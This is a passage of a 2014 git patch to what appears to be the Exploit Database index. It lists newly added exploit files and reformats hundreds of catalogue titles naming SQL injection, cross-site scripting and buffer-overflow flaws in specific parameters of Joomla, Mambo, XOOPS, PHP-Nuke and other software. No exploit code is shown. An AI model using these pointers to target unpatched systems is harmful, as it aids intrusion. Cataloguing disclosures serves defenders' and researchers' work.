From 0007ea191567c5d841d2326cf2fb9b38e55a2af5 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 28 Feb 2014 04:28:49 +0000 Subject: [PATCH] Updated 02_28_2014 --- files.csv | 1137 +++++++++++++------------- platforms/hardware/webapps/31900.txt | 323 ++++++++ platforms/linux/dos/31761.txt | 148 ++++ platforms/linux/dos/31915.py | 49 ++ platforms/multiple/dos/31919.c | 351 ++++++++ platforms/multiple/dos/31931.txt | 12 + platforms/multiple/dos/31932.txt | 9 + platforms/multiple/remote/31918.txt | 9 + platforms/multiple/remote/31920.txt | 11 + platforms/multiple/remote/31921.txt | 26 + platforms/multiple/remote/31922.txt | 20 + platforms/multiple/remote/31923.txt | 22 + platforms/multiple/remote/31924.txt | 19 + platforms/multiple/remote/31925.txt | 25 + platforms/multiple/remote/31926.txt | 16 + platforms/multiple/remote/31927.txt | 20 + platforms/multiple/remote/31928.txt | 16 + platforms/multiple/remote/31936.txt | 17 + platforms/multiple/remote/31941.txt | 11 + platforms/multiple/remote/31942.txt | 12 + platforms/osx/local/31940.txt | 9 + platforms/php/local/31937.txt | 45 + platforms/php/webapps/31916.txt | 33 + platforms/php/webapps/31929.txt | 22 + platforms/php/webapps/31933.txt | 9 + platforms/php/webapps/31935.txt | 8 + platforms/php/webapps/31938.txt | 11 + platforms/php/webapps/31939.txt | 10 + platforms/php/webapps/31943.html | 15 + platforms/php/webapps/31944.txt | 7 + platforms/php/webapps/31945.txt | 10 + platforms/php/webapps/31946.txt | 12 + platforms/php/webapps/31947.txt | 9 + platforms/windows/dos/31934.txt | 12 + platforms/windows/local/31930.txt | 78 ++ platforms/windows/remote/31917.rb | 123 +++ 36 files changed, 2115 insertions(+), 551 deletions(-) create mode 100755 platforms/hardware/webapps/31900.txt create mode 100755 platforms/linux/dos/31761.txt create mode 100755 platforms/linux/dos/31915.py create mode 100755 platforms/multiple/dos/31919.c create mode 100755 platforms/multiple/dos/31931.txt create mode 100755 platforms/multiple/dos/31932.txt create mode 100755 platforms/multiple/remote/31918.txt create mode 100755 platforms/multiple/remote/31920.txt create mode 100755 platforms/multiple/remote/31921.txt create mode 100755 platforms/multiple/remote/31922.txt create mode 100755 platforms/multiple/remote/31923.txt create mode 100755 platforms/multiple/remote/31924.txt create mode 100755 platforms/multiple/remote/31925.txt create mode 100755 platforms/multiple/remote/31926.txt create mode 100755 platforms/multiple/remote/31927.txt create mode 100755 platforms/multiple/remote/31928.txt create mode 100755 platforms/multiple/remote/31936.txt create mode 100755 platforms/multiple/remote/31941.txt create mode 100755 platforms/multiple/remote/31942.txt create mode 100755 platforms/osx/local/31940.txt create mode 100755 platforms/php/local/31937.txt create mode 100755 platforms/php/webapps/31916.txt create mode 100755 platforms/php/webapps/31929.txt create mode 100755 platforms/php/webapps/31933.txt create mode 100755 platforms/php/webapps/31935.txt create mode 100755 platforms/php/webapps/31938.txt create mode 100755 platforms/php/webapps/31939.txt create mode 100755 platforms/php/webapps/31943.html create mode 100755 platforms/php/webapps/31944.txt create mode 100755 platforms/php/webapps/31945.txt create mode 100755 platforms/php/webapps/31946.txt create mode 100755 platforms/php/webapps/31947.txt create mode 100755 platforms/windows/dos/31934.txt create mode 100755 platforms/windows/local/31930.txt create mode 100755 platforms/windows/remote/31917.rb diff --git a/files.csv b/files.csv index 7eeafc5cf..82c9d487d 100755 --- a/files.csv +++ b/files.csv @@ -9390,7 +9390,7 @@ id,file,description,date,author,platform,type,port 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 - 4.2-beta1 - Multiple XSS",2009-10-02,CoreLabs,jsp,webapps,0 10014,platforms/multiple/dos/10014.txt,"IPsec-Tools Prior to 0.7.2 - Multiple Remote Denial of Service Vulnerabilities",2009-11-09,mu-b,multiple,dos,0 10015,platforms/multiple/remote/10015.txt,"ISC DHCP 'dhclient' 'script_write_params()' - Stack Buffer Overflow Vulnerability",2009-11-10,"Jon Oberheide",multiple,remote,67 -10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 +10016,platforms/php/webapps/10016.pl,"JForJoomla JReservation Joomla! Component - 'pid' Parameter SQL Injection Vulnerability",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 'fput()' NULL Pointer Dereference Local Denial of Service Vulnerabilty",2009-11-09,"David Howells",linux,dos,0 10018,platforms/linux/local/10018.sh,"Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability",2009-11-12,"Earl Chew",linux,local,0 10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007, 2007 SP2 open_marker_file Buffer Overflow",2007-10-03,"Adriano Lima",linux,remote,3050 @@ -9527,9 +9527,9 @@ id,file,description,date,author,platform,type,port 10224,platforms/php/webapps/10224.txt,"Quick.Cart 3.4 and Quick.CMS 2.4 CSRF Vulnerabilities",2009-11-24,"Alice Kaerast",php,webapps,0 10225,platforms/windows/webapps/10225.txt,"MDaemon WebAdmin 2.0.x - SQL injection",2006-05-26,KOUSULIN,windows,webapps,1000 10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist (.m3u) BOF",2009-11-25,Rick2600,windows,local,0 -10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component 'cid' Parameter SQL Injection Vulnerability",2009-11-25,S@BUN,php,webapps,0 +10227,platforms/php/webapps/10227.txt,"Joomla! 'com_mygallery' Component - 'cid' Parameter SQL Injection Vulnerability",2009-11-25,S@BUN,php,webapps,0 10228,platforms/php/webapps/10228.txt,"WordPress WP-Cumulus <= 1.20 - Vulnerabilities",2009-11-25,MustLive,php,webapps,0 -10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module 'imageop.crop()' Buffer Overflow Vulnerability",2009-11-24,"Chris Evans",multiple,dos,0 +10229,platforms/multiple/dos/10229.txt,"Python < 2.5.2 Imageop Module - 'imageop.crop()' Buffer Overflow Vulnerability",2009-11-24,"Chris Evans",multiple,dos,0 10230,platforms/php/webapps/10230.txt,"Fake Hit Generator <= 2.2 Shell Upload Vulnerability",2009-11-25,DigitALL,php,webapps,0 10231,platforms/php/webapps/10231.txt,"Radio istek scripti 2.5 - Remote Configuration Disclosure Vulnerability",2009-11-25,"kurdish hackers team",php,webapps,0 10232,platforms/php/webapps/10232.txt,"Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability",2009-11-25,"Yogyacarderlink Crew",php,webapps,0 @@ -27895,7 +27895,7 @@ id,file,description,date,author,platform,type,port 31063,platforms/php/webapps/31063.txt,"WebCalendar 1.1.6 pref.php Query String XSS",2008-01-25,"Omer Singer",php,webapps,0 31064,platforms/php/webapps/31064.txt,"WebCalendar 1.1.6 search.php adv Parameter XSS",2008-01-25,"Omer Singer",php,webapps,0 31065,platforms/php/webapps/31065.txt,"F5 BIG-IP Application Security Manager 9.4.3 'report_type' Cross-Site Scripting Vulnerability",2008-01-26,nnposter,php,webapps,0 -31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0 +31066,platforms/php/webapps/31066.txt,"Mambo MOStlyCE 2.4 Module - 'connector.php' Cross-Site Scripting Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0 31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 'install.php' Local File Include Vulnerability",2008-01-28,p4imi0,php,webapps,0 31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility Arbitrary File Upload Vulnerability",2008-01-28,"AmnPardaz ",php,webapps,0 31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 'index.php' Cross-Site Scripting Vulnerability",2008-01-28,jekil,php,webapps,0 @@ -27906,7 +27906,7 @@ id,file,description,date,author,platform,type,port 31074,platforms/php/webapps/31074.txt,"Nucleus CMS <= 3.22 'action.php' Cross-Site Scripting Vulnerability",2008-01-20,"Alexandr Polyakov",php,webapps,0 31075,platforms/php/webapps/31075.txt,"AmpJuke 0.7 'index.php' Cross-Site Scripting Vulnerability",2008-01-29,ShaFuck31,php,webapps,0 31076,platforms/linux/remote/31076.py,"MPlayer 1.0rc2 'demux_mov.c' Remote Code Execution Vulnerability",2008-02-04,"Felipe Manzano",linux,remote,0 -31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 +31077,platforms/php/webapps/31077.txt,"Mambo/Joomla 'com_buslicense' Component - 'aid' Parameter SQL Injection Vulnerability",2008-01-30,S@BUN,php,webapps,0 31078,platforms/hardware/remote/31078.txt,"2Wire Routers 'H04_POST' Access Validation Vulnerability",2008-01-30,"Oligarchy Oligarchy",hardware,remote,0 31079,platforms/php/webapps/31079.txt,"webSPELL 4.1.2 'whoisonline.php' Cross-Site Scripting Vulnerability",2008-01-30,NBBN,php,webapps,0 31080,platforms/php/webapps/31080.txt,"YeSiL KoRiDoR Ziyaretçi Defteri 'index.php' SQL Injection Vulnerability",2008-01-30,ShaFuck31,php,webapps,0 @@ -27949,7 +27949,7 @@ id,file,description,date,author,platform,type,port 31118,platforms/windows/remote/31118.c,"Microsoft Works 8.0 File Converter Field Length Remote Code Execution Vulnerability",2008-02-06,"Luigi Auriemma",windows,remote,0 31119,platforms/multiple/remote/31119.txt,"TinTin++ and WinTin++ 1.97.9 - '#chat' Command Multiple Security Vulnerabilities",2008-02-06,"Luigi Auriemma",multiple,remote,0 31120,platforms/php/webapps/31120.txt,"MODx 0.9.6 index.php Multiple Parameter XSS",2008-02-07,"Alexandr Polyakov",php,webapps,0 -31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 +31121,platforms/php/webapps/31121.txt,"Joomla! and Mambo com_sermon 0.2 Component - 'gid' Parameter SQL Injection Vulnerability",2008-02-07,S@BUN,php,webapps,0 31122,platforms/windows/dos/31122.txt,"Ipswitch Instant Messaging 2.0.8.1 Multiple Security Vulnerabilities",2008-02-07,"Luigi Auriemma",windows,dos,0 31123,platforms/php/webapps/31123.txt,"PowerScripts PowerNews 2.5.6 'subpage' Parameter Multiple Local File Include Vulnerabilities",2008-02-08,"Alexandr Polyakov",php,webapps,0 31124,platforms/php/webapps/31124.txt,"Calimero.CMS 3.3 'id' Parameter Cross Site Scripting Vulnerability",2008-02-08,Psiczn,php,webapps,0 @@ -27983,7 +27983,7 @@ id,file,description,date,author,platform,type,port 31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 -31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 +31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0 31158,platforms/php/webapps/31158.txt,"Cacti <= 0.8.7 graph_view.php filter Parameter XSS",2008-02-12,aScii,php,webapps,0 @@ -27992,7 +27992,7 @@ id,file,description,date,author,platform,type,port 31161,platforms/php/webapps/31161.txt,"Cacti <= 0.8.7 index.php/sql.php Login Action login_username Parameter SQL Injection",2008-02-12,aScii,php,webapps,0 31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31163,platforms/windows/remote/31163.txt,"WinIPDS 3.3 rev. G52-33-021 Directory Traversal and Denial of Service Vulnerabilities",2008-02-12,"Luigi Auriemma",windows,remote,0 -31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 +31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 31168,platforms/windows/dos/31168.pl,"NCH Software Express Burn Plus 4.68 (.EBP) Project File Buffer Overflow",2014-01-24,LiquidWorm,windows,dos,0 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80 31174,platforms/php/webapps/31174.txt,"Joomla Komento Extension 1.7.2 - Stored XSS Vulnerabilities",2014-01-24,"High-Tech Bridge SA",php,webapps,80 @@ -28008,8 +28008,8 @@ id,file,description,date,author,platform,type,port 31189,platforms/java/webapps/31189.txt,"Cisco Unified Communications Manager <= 6.1 'key' Parameter SQL Injection Vulnerability",2008-02-13,"Nico Leidecker",java,webapps,0 31190,platforms/linux/dos/31190.txt,"OpenLDAP 2.3.39 MODRDN Remote Denial of Service Vulnerability",2008-02-13,"Ralf Haferkamp",linux,dos,0 31191,platforms/asp/webapps/31191.txt,"Site2Nite Real Estate Web 'agentlist.asp' Multiple SQL Injection Vulnerabilities",2008-02-13,S@BUN,asp,webapps,0 -31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 -31193,platforms/php/webapps/31193.txt,"Joomla! and Mambo 'com_omnirealestate' Component 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 +31192,platforms/php/webapps/31192.txt,"Joomla! and Mambo com_model Component - 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 +31193,platforms/php/webapps/31193.txt,"Joomla! and Mambo 'com_omnirealestate' Component - 'objid' Parameter SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 31194,platforms/php/webapps/31194.txt,"Dokeos <= 1.8.4 whoisonline.php id Parameter SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31195,platforms/php/webapps/31195.txt,"Dokeos <= 1.8.4 main/inc/lib/events.lib.inc.php Referer HTTP Header SQL Injection",2008-02-15,"Alexandr Polyakov",php,webapps,0 31196,platforms/php/webapps/31196.txt,"Dokeos <= 1.8.4 main/calendar/myagenda.php courseCode Parameter XSS",2008-02-15,"Alexandr Polyakov",php,webapps,0 @@ -28022,26 +28022,26 @@ id,file,description,date,author,platform,type,port 31203,platforms/multiple/dos/31203.txt,"Mozilla Firefox 2.0.0.12 IFrame Recursion Remote Denial of Service Vulnerability",2008-02-15,"Carl Hardwick",multiple,dos,0 31204,platforms/windows/remote/31204.txt,"Sophos Email Appliance 2.1 Web Interface Multiple Cross-Site Scripting Vulnerabilities",2008-02-15,"Leon Juranic",windows,remote,0 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0 -31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31208,platforms/php/webapps/31208.txt,"Joomla! and Mambo 'com_sg' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31209,platforms/php/webapps/31209.txt,"Joomla! and Mambo faq Component 'catid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component - 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31208,platforms/php/webapps/31208.txt,"Joomla! and Mambo 'com_sg' Component - 'pid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31209,platforms/php/webapps/31209.txt,"Joomla! and Mambo faq Component - 'catid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 'index.php' SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x 'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31213,platforms/php/webapps/31213.txt,"Joomla! and Mambo 'com_salesrep' Component 'rid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -31214,platforms/php/webapps/31214.txt,"Joomla! and Mambo com_lexikon Component 'id' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 -31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component 'filecatid' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 -31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31213,platforms/php/webapps/31213.txt,"Joomla! and Mambo 'com_salesrep' Component - 'rid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +31214,platforms/php/webapps/31214.txt,"Joomla! and Mambo com_lexikon Component - 'id' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 +31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component - 'filecatid' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 +31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component - 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 31217,platforms/php/webapps/31217.txt,"BanPro DMS 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0 31218,platforms/linux/dos/31218.txt,"freeSSHd 1.2 - 'SSH2_MSG_NEWKEYS' Packet Remote Denial of Service Vulnerability",2008-02-17,"Luigi Auriemma",linux,dos,0 31220,platforms/linux/dos/31220.py,"MP3Info 0.8.5a - Buffer Overflow",2014-01-27,jsacco,linux,dos,0 31221,platforms/windows/webapps/31221.txt,"Ability Mail Server 2013 - Password Reset CSRF from Stored XSS (Web UI)",2014-01-27,"David Um",windows,webapps,0 31222,platforms/windows/dos/31222.py,"Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow PoC",2014-01-27,Citadelo,windows,dos,0 31223,platforms/multiple/dos/31223.txt,"Mozilla Thunderbird 17.0.6 - Input Validation Filter Bypass",2014-01-27,Vulnerability-Lab,multiple,dos,0 -31224,platforms/php/webapps/31224.txt,"Joomla! and Mambo com_profile Component 'oid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31224,platforms/php/webapps/31224.txt,"Joomla! and Mambo com_profile Component - 'oid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 'admin.php' Cross-Site Scripting Vulnerability",2008-02-18,NBBN,php,webapps,0 -31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 +31226,platforms/php/webapps/31226.txt,"Joomla! and Mambo com_detail Component - 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x 'sf-profile.php' SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31228,platforms/php/webapps/31228.txt,"WordPress Recipes Blog Plugin 'id' Parameter SQL Injection Vulnerability",2008-02-18,S@BUN,php,webapps,0 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0 @@ -28056,18 +28056,18 @@ id,file,description,date,author,platform,type,port 31238,platforms/php/webapps/31238.txt,"Jinzora 2.7.5 popup.php Multiple Parameter XSS",2008-02-19,"Alexandr Polyakov",php,webapps,0 31239,platforms/php/webapps/31239.txt,"Google Hack Honeypot File Upload Manager 1.3 'delall' Unauthorized File Access Vulnerability",2008-02-19,Mr-m07,php,webapps,0 31240,platforms/php/webapps/31240.txt,"SmarterTools SmarterMail 4.3 Subject Field HTML Injection Vulnerability",2008-02-19,"Juan Pablo Lopez Yacubian",php,webapps,0 -31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module 'artid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31241,platforms/php/webapps/31241.txt,"PHP-Nuke Sections Module - 'artid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31242,platforms/php/webapps/31242.txt,"Facile Forms 1.x 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31243,platforms/php/webapps/31243.txt,"Joomla! and Mambo 'com_team' Component SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component 'cat' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component 'pageid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 -31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31244,platforms/php/webapps/31244.txt,"Joomla! and Mambo com_iigcatalog Component - 'cat' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31245,platforms/php/webapps/31245.txt,"Joomla! and Mambo com_formtool Component - 'catid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31246,platforms/php/webapps/31246.txt,"Joomla! and Mambo com_genealogy Component - 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31247,platforms/php/webapps/31247.txt,"iJoomla com_magazine Component - 'pageid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31248,platforms/php/webapps/31248.txt,"XOOPS 'vacatures' Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31249,platforms/php/webapps/31249.txt,"XOOPS 'events' Module - 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31250,platforms/php/webapps/31250.txt,"XOOPS 'seminars' Module - 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31251,platforms/php/webapps/31251.txt,"XOOPS 'badliege' Module - 'id' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 +31252,platforms/php/webapps/31252.txt,"PHP-Nuke Web_Links Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-19,S@BUN,php,webapps,0 31253,platforms/jsp/remote/31253.rb,"Oracle Forms and Reports 11.1 - Remote Exploit",2014-01-29,Mekanismen,jsp,remote,80 31254,platforms/windows/remote/31254.py,"PCMAN FTP 2.07 ABOR Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 31255,platforms/windows/remote/31255.py,"PCMAN FTP 2.07 CWD Command - Buffer Overflow Exploit",2014-01-29,"Mahmod Mahajna (Mahy)",windows,remote,21 @@ -28085,146 +28085,146 @@ id,file,description,date,author,platform,type,port 31269,platforms/php/webapps/31269.txt,"Spyce 2.1.3 spyce/examples/formtag.spy Multiple Parameter XSS",2007-02-19,"Richard Brain",php,webapps,0 31270,platforms/php/webapps/31270.txt,"Spyce 2.1.3 spyce/examples/automaton.spy Direct Request Error Message Information Disclosure",2007-02-19,"Richard Brain",php,webapps,0 31271,platforms/multiple/dos/31271.txt,"Sybase MobiLink 10.0.1.3629 - Multiple Heap Buffer Overflow Vulnerabilities",2008-02-20,"Luigi Auriemma",multiple,dos,0 -31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0 -31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31272,platforms/php/webapps/31272.txt,"Joomla! and Mambo 'com_joomlavvz' Component - 'id' Parameter SQL Injection Vulnerability",2008-02-20,S@BUN,php,webapps,0 +31273,platforms/php/webapps/31273.txt,"Joomla! and Mambo 'com_most' Component - 'secid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31274,platforms/php/webapps/31274.txt,"Joomla! and Mambo 'com_asortyment' Component - 'katid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 31275,platforms/asp/webapps/31275.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Comments.asp FC Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31276,platforms/asp/webapps/31276.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 Labels.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",asp,webapps,0 31277,platforms/php/webapps/31277.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 ClassList.asp Term Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 31278,platforms/php/webapps/31278.txt,"Eagle Software Aeries Student Information System 3.7.2.2/3.8.2.8 GradebookStuScores.asp GrdBk Parameter SQL Injection",2008-02-21,"Arsalan Emamjomehkashan",php,webapps,0 -31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 Calendar 'Count' Parameter Cross-Site Scripting Vulnerability",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0 -31280,platforms/php/webapps/31280.txt,"Joomla! and Mambo Referenzen Component 'id' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module 'Details' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 'print' Option SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module 'sid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 -31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31279,platforms/multiple/remote/31279.txt,"IBM Lotus Quickr QuickPlace Server 8.0 - Calendar 'Count' Parameter Cross-Site Scripting Vulnerability",2008-02-21,"Nir Goldshlager AVNE",multiple,remote,0 +31280,platforms/php/webapps/31280.txt,"Joomla! and Mambo Referenzen Component - 'id' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31281,platforms/php/webapps/31281.txt,"PHP-Nuke Classifieds Module - 'Details' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 +31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection Vulnerability",2008-02-21,S@BUN,php,webapps,0 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 